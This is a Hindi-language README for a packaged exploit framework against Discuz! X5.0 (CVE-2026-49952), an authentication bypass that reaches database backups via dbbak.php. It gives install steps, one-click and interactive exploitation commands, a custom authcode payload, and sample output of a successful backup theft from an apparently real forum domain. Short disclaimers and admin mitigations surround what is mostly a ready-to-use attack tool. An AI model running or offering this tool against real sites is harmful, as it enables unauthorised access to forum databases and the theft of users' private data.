
Discuz! X5.0 Authentication Bypass Exploit Framework (CVE-2026-49952) - गंभीर भेद्यता जो UC_KEY एन्क्रिप्शन ओरेकल टोकन पुन: उपयोग के माध्यम से बिना प्रमाणीकरण के डेटाबेस बैकअप तक पहुंच की अनुमति देती है। CVSS 9.1। संस्करण का पता लगाने, मल्टी-पेलोड हमलों, इंटरैक्टिव शेल और स्वचालित एक्सप्लॉइटेशन के साथ पूर्ण सुविधाओं वाला टूल। केवल अधिकृत परीक्षण के लिए।
⚡ CVE-2026-49952 | CVSS 9.1 (गंभीर ) | संस्करण 1.0.0
Discuz! X5.0 में गंभीर प्रमाणीकरण बायपास भेद्यता की पहचान करने और उसे प्रदर्शित करने के लिए डिज़ाइन किया गया एक पेशेवर पेनिट्रेशन परीक्षण उपकरण।
महत्वपूर्ण सूचनायह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है।इस उपकरण का उपयोग ऐसी प्रणालियों पर न करें जिनके स्वामी आप नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है।कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध और अनैतिक है।लेखक इस उपकरण से होने वाले किसी भी दुरुपयोग या क्षति के लिए कोई जिम्मेदारी नहीं लेता है।इस उपकरण का उपयोग करके, आप सभी लागू कानूनों और विनियमों का पालन करने के लिए सहमत होते हैं।
Discuz! X5.0 Authentication Bypass Exploit Framework 20 मार्च 2026 और 1 मई 2026 के बीच जारी Discuz! X5.0 संस्करणों में गंभीर प्रमाणीकरण बायपास भेद्यता (CVE-2026-49952) की पहचान करने और उसे प्रदर्शित करने के लिए डिज़ाइन किया गया है।
यह भेद्यता अनप्रमाणित हमलावरों को टोकन पुन: उपयोग के लिए UC_KEY एन्क्रिप्शन ओरेकल का शोषण करके डेटाबेस बैकअप कार्यक्षमता (dbbak.php) तक पहुँचने की अनुमति देती है, जिससे संवेदनशील डेटाबेस सामग्री उजागर हो सकती है।
🏆 CVSS स्कोर: 9.1 (गंभीर)
🔐 प्रभाव: प्रमाणीकरण बायपास
📂 पहुँच: डेटाबेस बैकअप फ़ाइलें
⚡ जटिलता: निम्न (शोषण करना आसान)
🎯 लक्ष्य: Discuz! X5.0 (20260320 - 20260501)
यह भेद्यता dbbak.php एंडपॉइंट में मौजूद है, जहाँ टोकन सत्यापन तंत्र UC_KEY एन्क्रिप्शन ओरेकल पर निर्भर करता है। लॉगिन अनुरोध (member.php) में एक विशिष्ट पेलोड तैयार करके, एक हमलावर एक वैध प्रमाणीकरण टोकन प्राप्त कर सकता है, जिसे उचित प्राधिकरण के बिना डेटाबेस बैकअप कार्यक्षमता तक पहुँचने के लिए पुन: उपयोग किया जा सकता है।
❌ Discuz! X5.0 (20260320 - 20260501) - असुरक्षित
✅ Discuz! X5.0 (20260510+) - पैच किया गया
🔍 संस्करण पहचान: स्वचालित फिंगरप्रिंटिंग और Discuz! संस्करण की पहचान।
⚡ मल्टी-पेलोड हमला: कई पेलोड वेरिएंट का समानांतर परीक्षण।
🖥️ इंटरैक्टिव शेल: मैन्युअल शोषण के लिए पूर्ण-विशेषताओं वाला कमांड-लाइन इंटरफ़ेस।
🚀 स्वचालित शोषण: न्यूनतम कॉन्फ़िगरेशन के साथ एक-क्लिक शोषण।
📊 परिणाम सहेजना: शोषण परिणामों को टाइमस्टैम्प्ड फ़ाइलों में निर्यात करें।
🌐 प्रॉक्सी समर्थन: नेटवर्क ट्रैवर्सल के लिए HTTP/HTTPS प्रॉक्सी कॉन्फ़िगरेशन।
🎯 थ्रेडेड स्कैनिंग: प्रदर्शन अनुकूलन के लिए कॉन्फ़िगर करने योग्य थ्रेड संख्या।
🎨 रंगीन आउटपुट: पेशेवर रंग-कोडित टर्मिनल आउटपुट।
🔐 SSL/TLS समर्थन: HTTP और HTTPS दोनों लक्ष्यों को संभालता है।
🔄 सत्र प्रबंधन: स्थायी सत्र स्थिति बनाए रखता है।
📦 पेलोड अनुकूलन: कस्टम पेलोड इंजेक्शन के लिए समर्थन।
🎯 लक्ष्य सत्यापन: शोषण से पहले Discuz! इंस्टॉलेशन की पुष्टि करता है।
Python: संस्करण 3.7 या उससे अधिक
Pip: Python पैकेज मैनेजर
# Clone the repository
git clone https://github.com/CerberusMrXi/Discuz-X5.0-Authentication-Bypass-Exploit-Framework
cd Discuz-X5.0-Authentication-Bypass-Exploit-Framework
# Install required packages
pip install -r requirements.txt
# Verify installation
python3 exploit.py --help
# Build the Docker image
docker build -t exploit .
# Run the container
docker run -it --rm exploit http://target.com
# Simple exploitation
python3 exploit.py http://target.com
# With output file
python3 exploit.py http://target.com --output results.txt
# Verbose mode for debugging
python3 exploit.py http://target.com --verbose
# With proxy and custom threads
python3 exploit.py https://target.com --proxy http://127.0.0.1:8080 --threads 10
# Custom payload
python3 exploit.py http://target.com --payload "admin|1|0|0"
python3 exploit.py http://discuz.eda.com.my
██████╗ ██╗███████╗██╗ ██╗███████╗███████╗██████╗
██╔══██╗██║██╔════╝██║ ██║╚══███╔╝╚══███╔╝╚════██╗
██║ ██║██║███████╗██║ ██║ ███╔╝ ███╔╝ █████╔╝
██║ ██║██║╚════██║██║ ██║ ███╔╝ ███╔╝ ██╔═══╝
██████╔╝██║███████║╚██████╔╝███████╗███████╗███████╗
╚═════╝ ╚═╝╚══════╝ ╚═════╝ ╚══════╝╚══════╝╚══════╝
Discuz! X5.0 Authentication Bypass Exploit Framework
CVE-2026-49952 | CVSS: 9.1 (Critical )
Author: Sudeepa Wanigarathna | Version: 1.0.0
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[14:32:15] ► Phase 1: Target Reconnaissance
[14:32:15] ➜ Testing connectivity to http://discuz.eda.com.my
[14:32:16] ➜ Detecting Discuz! version...
[14:32:16] ✔ Discuz! Version: X5.0
[14:32:16] ⚡ Target is running a vulnerable version!
[14:32:16] ► Phase 2: Authcode Acquisition
[14:32:16] ➜ Extracting authcode with payload: admin|1|0|0
[14:32:17] ✔ Authcode: aBcDeFgHiJkLmNoPqRsT...
[14:32:17] ► Phase 3: Exploitation
[14:32:17] ➜ Executing exploit (operation: backup )
[14:32:18] ✔ Exploit successful!
[14:32:18] ✔ Results saved to discuz_exploit_20260724_143218.txt
╔══════════════════════════════════════════════════════════╗
║ EXPLOIT SUCCESSFUL ║
╠══════════════════════════════════════════════════════════╣
║ Target: http://discuz.eda.com.my ║
║ Authcode: aBcDeFgHiJkLmNoPqRsT... ║
║ Status: Database backup accessed ║
║ Data Size: 24567 bytes ║
║ Saved to: discuz_exploit_20260724_143218.txt ║
╚══════════════════════════════════════════════════════════╝
मैन्युअल शोषण के लिए इंटरैक्टिव शेल प्रारंभ करें:
python3 discuz_exploit.py http://target.com --interactive
केवल उन प्रणालियों पर उपयोग करें जिनके स्वामी आप हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति है।
परीक्षण से पहले लिखित प्राधिकरण प्राप्त करें।
जिम्मेदार प्रकटीकरण प्रथाओं का पालन करें।
भेद्यताओं की सूचना विक्रेताओं को उचित रूप से दें।
सीखने के लिए पृथक प्रयोगशाला वातावरण में उपयोग करें।
बिना प्राधिकरण के प्रोडक्शन सिस्टम के विरुद्ध कभी उपयोग न करें।
शोषित डेटा को सार्वजनिक रूप से साझा न करें।
अवैध गतिविधियों या डेटा चोरी के लिए कभी उपयोग न करें।
परीक्षण के दौरान डेटा को संशोधित या हटाएँ न करें।
सहमति के बिना कभी शोषण न करें।
सिस्टम प्रशासकों के लिए:
तुरंत अपडेट करें: Discuz! X5.0 (20260510+) या उसके बाद के संस्करण में अपग्रेड करें।
एंडपॉइंट अक्षम करें: यदि आवश्यक न हो तो dbbak.php को अस्थायी रूप से अक्षम करें।
लॉग की निगरानी करें: संदिग्ध member.php और dbbak.php एक्सेस पर नज़र रखें।
WAF नियम: दुर्भावनापूर्ण अनुरोधों को ब्लॉक करने के लिए वेब एप्लिकेशन फ़ायरवॉल नियम लागू करें।
IP व्हाइटलिस्टिंग: बैकअप एंडपॉइंट एक्सेस को विश्वसनीय IP तक सीमित करें।
Error: Failed to connect to target
Solutions:
• Check if target URL is correct
• Verify network connectivity
• Check for firewalls blocking access
• Try with proxy: --proxy http://your_proxy:port
• Ensure target is online and accessible
Error: Authentication failed or invalid authcode
Solutions:
• Ensure the target Discuz! version is vulnerable
• Try different payloads for authcode extraction
• Check for network issues or WAF interference
• Run in verbose mode (--verbose ) for more details
यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है।
कॉपीराइट © 2026 Sudeepa Wanigarathna
इसके द्वारा, इस सॉफ़्टवेयर और संबंधित दस्तावेज़ फ़ाइलों ("सॉफ़्टवेयर") की एक प्रति प्राप्त करने वाले किसी भी व्यक्ति को, बिना किसी प्रतिबंध के सॉफ़्टवेयर से निपटने की अनुमति निःशुल्क प्रदान की जाती है, जिसमें बिना किसी सीमा के सॉफ़्टवेयर की प्रतियों का उपयोग, प्रतिलिपि, संशोधन, विलय, प्रकाशन, वितरण, उप-लाइसेंस और/या बेचने के अधिकार शामिल हैं, तथा जिन व्यक्तियों को सॉफ़्टवेयर प्रदान किया जाता है, उन्हें निम्नलिखित शर्तों के अधीन ऐसा करने की अनुमति दी जाती है:
उपरोक्त कॉपीराइट सूचना और यह अनुमति सूचना सॉफ़्टवेयर की सभी प्रतियों या महत्वपूर्ण भागों में शामिल की जाएँगी।
सॉफ़्टवेयर "जैसा है" (AS IS) प्रदान किया जाता है, बिना किसी प्रकार की वारंटी के, व्यक्त या निहित, जिसमें व्यापारिकता, किसी विशेष उद्देश्य के लिए उपयुक्तता और गैर-उल्लंघन की वारंटी शामिल है लेकिन इन्हीं तक सीमित नहीं है। किसी भी स्थिति में लेखक या कॉपीराइट धारक किसी भी दावे, क्षति या अन्य दायित्व के लिए उत्तरदायी नहीं होंगे, चाहे वह अनुबंध की कार्रवाई, टोर्ट या अन्यथा में हो, जो सॉफ़्टवेयर से या सॉफ़्टवेयर के उपयोग या अन्य व्यवहार से उत्पन्न हो या उससे संबंधित हो।
लेखक: Sudeepa Wanigarathna | GitHub: @CerberusMrXi
⭐ यदि आपको यह उपकरण उपयोगी लगे, तो कृपया इसे एक स्टार देने पर विचार करें!
🔐 जिम्मेदारी से उपयोग करें। नैतिक बने रहें। सीखते रहें।
| गुण | विवरण |
|---|
| भेद्यता प्रकार | प्रमाणीकरण बायपास |
| CVE ID | CVE-2026-49952 |
| CVSS संस्करण | 3.1 |
| CVSS स्कोर | 9.1 (गंभीर) |
| हमला वेक्टर | नेटवर्क |
| हमले की जटिलता | निम्न |
| आवश्यक विशेषाधिकार | कोई नहीं |
| उपयोगकर्ता सहभागिता | कोई नहीं |
| गोपनीयता प्रभाव | उच्च |
| अखंडता प्रभाव | उच्च |
| उपलब्धता प्रभाव | उच्च |
| एक्सप्लॉइट कोड परिपक्वता | कार्यात्मक |
| उपचार स्तर | आधिकारिक फिक्स उपलब्ध |
| कमांड | विवरण | उदाहरण |
|---|
help | सभी उपलब्ध कमांड दिखाएँ | help |
scan | Discuz! संस्करण का पता लगाएँ और भेद्यता जाँचें | scan |
get [payload] | ऑथकोड निकालें (वैकल्पिक कस्टम पेलोड ) | `get admin |
exploit [op] | एक्सप्लॉइट निष्पादित करें (डिफ़ॉल्ट: बैकअप) | exploit backup |
save | परिणाम फ़ाइल में सहेजें | save |
info | सत्र जानकारी प्रदर्शित करें | info |
clear | टर्मिनल स्क्रीन साफ़ करें | clear |
exit / quit | इंटरैक्टिव शेल से बाहर निकलें | exit |